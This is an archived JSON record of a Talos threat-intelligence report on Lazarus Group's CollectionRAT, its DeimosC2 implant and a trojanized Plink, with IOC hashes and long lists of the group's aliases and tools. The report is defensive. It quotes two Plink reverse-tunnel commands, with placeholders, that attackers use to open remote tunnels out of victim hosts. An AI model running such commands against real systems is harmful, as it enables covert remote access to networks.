{
	"id": "7a512182-8404-4c50-9d5e-6c691fc61648",
	"created_at": "2026-04-06T00:07:09.895639Z",
	"updated_at": "2026-04-10T03:38:19.252163Z",
	"deleted_at": null,
	"sha1_hash": "af49b1c03b279bab539136a05c4955863e535b47",
	"title": "Lazarus Group's infrastructure reuse leads to discovery of new malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1564159,
	"plain_text": "Lazarus Group's infrastructure reuse leads to discovery of new\r\nmalware\r\nBy Asheer Malhotra\r\nPublished: 2023-08-24 · Archived: 2026-04-05 14:04:13 UTC\r\nThursday, August 24, 2023 08:04\r\nIn the Lazarus Group’s latest campaign, which we detailed in a recent blog, the North Korean state-sponsored actor is exploiting CVE-2022-47966, a ManageEngine ServiceDesk vulnerability to deploy\r\nmultiple threats. In addition to their “QuiteRAT” malware, which we covered in the blog, we also\r\ndiscovered Lazarus Group using a new threat called “CollectionRAT.”\r\nCollectionRAT has standard remote access trojan (RAT) capabilities, including the ability to run arbitrary\r\ncommands on an infected system. Based on our analysis, CollectionRAT appears to be connected to\r\nJupiter/EarlyRAT, another malware family Kaspersky recently wrote about and attributed to Andariel, a\r\nsubgroup within the Lazarus Group umbrella of threat actors.\r\nLazarus Group appears to be changing its tactics, increasingly relying on open-source tools and\r\nframeworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.\r\nOne such example of this trend is Lazarus Group’s use of the open-source DeimosC2 framework. The\r\nDeimosC2 agent we discovered in this campaign is an ELF binary, indicating Lazarus’ intention to deploy\r\nthis implant during initial access against compromised Linux endpoints.\r\nLazarus Group reuses infrastructure in continuous assault on enterprises\r\nIn the new Lazarus Group campaign we recently disclosed, the North Korean state-sponsored actor continues to\r\nuse much of the same infrastructure despite those components being well-documented by security researchers over\r\nhttps://blog.talosintelligence.com/lazarus-collectionrat/\r\nPage 1 of 10\n\nthe years. 
Their continued use of the same tactics, techniques and procedures (TTPs) — many of which are publicly known — highlights the group’s confidence in their operations and presents opportunities for security researchers. By tracking and analyzing these reused infrastructure components, we identified the new CollectionRAT malware detailed in this report.\r\nAs mentioned, Lazarus Group remains highly active, with this being their third documented campaign in less than a year. In September 2022, Talos published details of a Lazarus Group campaign targeting energy providers in the United States, Canada and Japan. This campaign, enabled by the successful exploitation of the Log4j vulnerability, heavily employed a previously unknown implant we called “MagicRAT,” along with known malware families VSingle, YamaBot and TigerRAT, all of which were previously attributed to the threat actor by Japanese and Korean government agencies.\r\nSome of the TTPs used in another Lazarus Group campaign in late 2022 have been highlighted by WithSecure. This report illustrated Lazarus Group exploiting unpatched Zimbra devices and deploying a remote access trojan (RAT) similar to MagicRAT. This is the same RAT Talos observed being deployed after Lazarus Group’s exploitation of ManageEngine ServiceDesk, which we detailed in an earlier blog, known as “QuiteRAT.” QuiteRAT and MagicRAT are both based on the Qt framework and have similar capabilities, but QuiteRAT is likely an attempt to compact MagicRAT into a smaller and easier-to-deploy malicious implant, based on its size.\r\nIn addition to this recent campaign illustrating how active Lazarus Group remains, this activity also serves as another example of the actor reusing the same infrastructure. We discovered that QuiteRAT and the open-source DeimosC2 agents used in this campaign were hosted on the same remote locations used by the Lazarus Group in their preceding campaign from 2022 that deployed MagicRAT. This infrastructure was also used for commanding and controlling CollectionRAT, the newest malware in the actor’s arsenal. A malicious copy of PuTTY’s Plink utility (a reverse-tunneling tool) was also hosted on the same infrastructure serving CollectionRAT to compromised endpoints. Lazarus has been known to use dual-use utilities in their operations, especially for reverse tunneling, such as Plink and 3proxy.\r\nSome CollectionRAT malware from 2021 was signed with the same code-signing certificate as Jupiter/EarlyRAT (also from 2021), a malware family listed in CISA’s advisory detailing recent North Korean ransomware activity. The connections between the various malware are depicted below:\r\nLazarus evolves malicious arsenal with CollectionRAT and DeimosC2\r\nCollectionRAT consists of a variety of standard RAT capabilities, including the ability to run arbitrary commands and manage files on the infected endpoint. The implant consists of a packed Microsoft Foundation Class (MFC) library-based Windows binary that decrypts and executes the actual malware code on the fly. Malware developers like using MFC even though it’s a complex, object-oriented wrapper. MFC, which traditionally is used to create Windows applications’ user interfaces, controls and events, allows multiple components of malware to seamlessly work with each other while abstracting the inner implementations of the Windows OS from the authors. Using such a complex framework in malware makes human analysis more cumbersome. However, in CollectionRAT, the MFC framework has just been used as a wrapper/decrypter for the actual malicious code.\r\nCollectionRAT initially gathers system information to fingerprint the infection and relay it to the C2 server. It then receives commands from the C2 server to perform a variety of tasks on the infected system. The implant has the ability to create a reverse shell, allowing it to run arbitrary commands on the system. The implant can read and write files from the disk and spawn new processes, allowing it to download and deploy additional payloads. The implant can also remove itself from the endpoint when directed by the C2.\r\nImplant's configuration strings.\r\nThe preliminary system information is sent to the C2 server to register the infection, which subsequently issues commands to the implant.\r\nInitial check-in over HTTP to C2 server.\r\nCollectionRAT and its link to EarlyRAT\r\nAnalyzing CollectionRAT indicators of compromise (IOCs) enabled us to discover links to EarlyRAT, a PureBasic-based implant that security research firm Kaspersky recently attributed to the Andariel subgroup. We discovered a CollectionRAT sample signed with the same certificate used to sign an older version of EarlyRAT from 2021. Both sets of samples used the same certificate from “OSPREY VIDEO INC.” with the same serial number and thumbprint. The EarlyRAT malware was also listed in CISA’s advisory from February 2023 highlighting ransomware activity conducted by North Korea against healthcare and critical infrastructure entities across the world. Kaspersky reported that EarlyRAT is deployed via the successful exploitation of the Log4j vulnerability. EarlyRAT is also known as the “Jupiter” malware. DCSO CyTec’s blog contains more details about Jupiter.\r\nCommon OSPREY VIDEO INC certificate from 2021 used to sign CollectionRAT and EarlyRAT\r\nLazarus Group appears to be shifting its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks as opposed to strictly employing them in the post-compromise phase. Lazarus Group previously relied on the use of custom-built implants such as MagicRAT, VSingle, DTrack, and Yamabot as a means of establishing persistent initial access on a successfully compromised system. These implants are then instrumented to deploy a variety of open-source or dual-use tools to perform a multitude of malicious hands-on-keyboard activities in the compromised enterprise network. These include proxy tools, credential-dumping tools such as Mimikatz and post-compromise reconnaissance and pivoting frameworks such as Impacket. However, these tools have primarily been used in the post-compromise phase of the attack. This campaign is one such instance where the attackers used the DeimosC2 open-source C2 framework as a means of initial and persistent access. DeimosC2 is a GoLang-based C2 framework supporting a variety of RAT capabilities similar to other popular C2 frameworks such as Cobalt Strike and Sliver.\r\nDeimosC2 analysis\r\nApart from the many dual-use tools and post-exploitation frameworks found on Lazarus Group’s hosting infrastructure, we discovered the presence of a new implant that we identified as a beacon from the open-source DeimosC2 framework. Contrary to most of the malware found on their hosting infrastructure, the DeimosC2 implant was a Linux ELF binary, indicating the intention of the group to deploy it during the initial access on Linux-based servers.\r\nThe implant itself is an unmodified copy of the regular beacon that the DeimosC2 C2 server produces when configured with the required parameters. It contains the standard URI paths that remain the same as the configuration provided in an out-of-the-box configuration of the implant. The lack of heavy customization of the implant indicates that the operators of DeimosC2 in this campaign may still be in the process of getting used to and adapting the framework to their needs.\r\nConfiguration in the DeimosC2 implant.\r\nTrend Micro has an excellent analysis of DeimosC2; the implants typically have various RAT capabilities such as:\r\nExecute arbitrary commands on the endpoint.\r\nCredential stealing and registry dumping.\r\nDownload and upload files from C2.\r\nShellcode execution.\r\nUninstallation of the implant.\r\nMalicious Plink\r\nAnother open-source tool we observed Lazarus Group using is the reverse tunneling tool PuTTY Link (Plink). In the past, we’ve observed Lazarus Group use Plink to establish a remote tunnel using commands such as:\r\npvhost.exe -N -R 18118:127.0.0.1:8118 -P [Port] -l [username] -pw [password] \u003cRemote_IP\u003e\r\nThe option -R forwards port 8118 on 127.0.0.1 to the remote server on port 18118.\r\nHowever, we found that Lazarus Group has now started generating malicious Plink binaries out of PuTTY’s source code to embed the reverse tunnel command strings in the binary itself. The following figure shows a comparison of:\r\nThe malicious Plink binary on the left contains the reverse tunnel command with the switches in the format:\r\nPlink.exe -N -R 4443:127.0.0.1:80 -P 443 -l [username] -pw [password] \u003cRemote_IP\u003e\r\nA benign Plink binary on the right was used in 2022 by Lazarus as part of their hands-on-keyboard activity.\r\nA malicious copy of Plink (left) compared to a benign version (right), both used by Lazarus.\r\nThe malicious Plink will also create a mutex named “Global\\WindowsSvchost” before establishing the remote tunnel to ensure that only one connection is made between the local machine and C2.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall Management Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat: 62248, 62253-62255.\r\nIOCs\r\nIOCs for this research can also be found in our GitHub repository here.\r\nHashes\r\nQuiteRAT\r\ned8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6\r\nCollectionRAT\r\ndb6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984\r\n773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df\r\nDeimosC2\r\n05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d\r\nTrojanized Plink\r\ne3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe\r\nSource: https://blog.talosintelligence.com/lazarus-collectionrat/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blog.talosintelligence.com/lazarus-collectionrat/"
	],
	"report_names": [
		"lazarus-collectionrat"
	],
	"threat_actors": [
		{
			"id": "838f6ced-12a4-4893-991a-36d231d96efd",
			"created_at": "2022-10-25T15:50:23.347455Z",
			"updated_at": "2026-04-10T02:00:05.295717Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"Andariel",
				"Silent Chollima",
				"PLUTONIUM",
				"Onyx Sleet"
			],
			"source_name": "MITRE:Andariel",
			"tools": [
				"Rifdoor",
				"gh0st RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "110e7160-a8cc-4a66-8550-f19f7d418117",
			"created_at": "2023-01-06T13:46:38.427592Z",
			"updated_at": "2026-04-10T02:00:02.969896Z",
			"deleted_at": null,
			"main_name": "Silent Chollima",
			"aliases": [
				"Onyx Sleet",
				"PLUTONIUM",
				"OperationTroy",
				"Guardian of Peace",
				"GOP",
				"WHOis Team",
				"Andariel",
				"Subgroup: Andariel"
			],
			"source_name": "MISPGALAXY:Silent Chollima",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc6e3644-3249-44f3-a277-354b7966dd1b",
			"created_at": "2022-10-25T16:07:23.760559Z",
			"updated_at": "2026-04-10T02:00:04.741239Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"APT 45",
				"Andariel",
				"G0138",
				"Jumpy Pisces",
				"Onyx Sleet",
				"Operation BLACKMINE",
				"Operation BLACKSHEEP/Phase 3.",
				"Operation Blacksmith",
				"Operation DESERTWOLF/Phase 3",
				"Operation GHOSTRAT",
				"Operation GoldenAxe",
				"Operation INITROY/Phase 1",
				"Operation INITROY/Phase 2",
				"Operation Mayday",
				"Operation VANXATM",
				"Operation XEDA",
				"Plutonium",
				"Silent Chollima",
				"Stonefly"
			],
			"source_name": "ETDA:Andariel",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "771d9263-076e-4b6e-bd58-92b6555eb739",
			"created_at": "2025-08-07T02:03:25.092436Z",
			"updated_at": "2026-04-10T02:00:03.758541Z",
			"deleted_at": null,
			"main_name": "NICKEL HYATT",
			"aliases": [
				"APT45 ",
				"Andariel",
				"Dark Seoul",
				"Jumpy Pisces ",
				"Onyx Sleet ",
				"RIFLE Campaign",
				"Silent Chollima ",
				"Stonefly ",
				"UN614 "
			],
			"source_name": "Secureworks:NICKEL HYATT",
			"tools": [
				"ActiveX 0-day",
				"DTrack",
				"HazyLoad",
				"HotCriossant",
				"Rifle",
				"UnitBot",
				"Valefor"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434029,
	"ts_updated_at": 1775792299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/af49b1c03b279bab539136a05c4955863e535b47.pdf",
		"text": "https://archive.orkl.eu/af49b1c03b279bab539136a05c4955863e535b47.txt",
		"img": "https://archive.orkl.eu/af49b1c03b279bab539136a05c4955863e535b47.jpg"
	}
}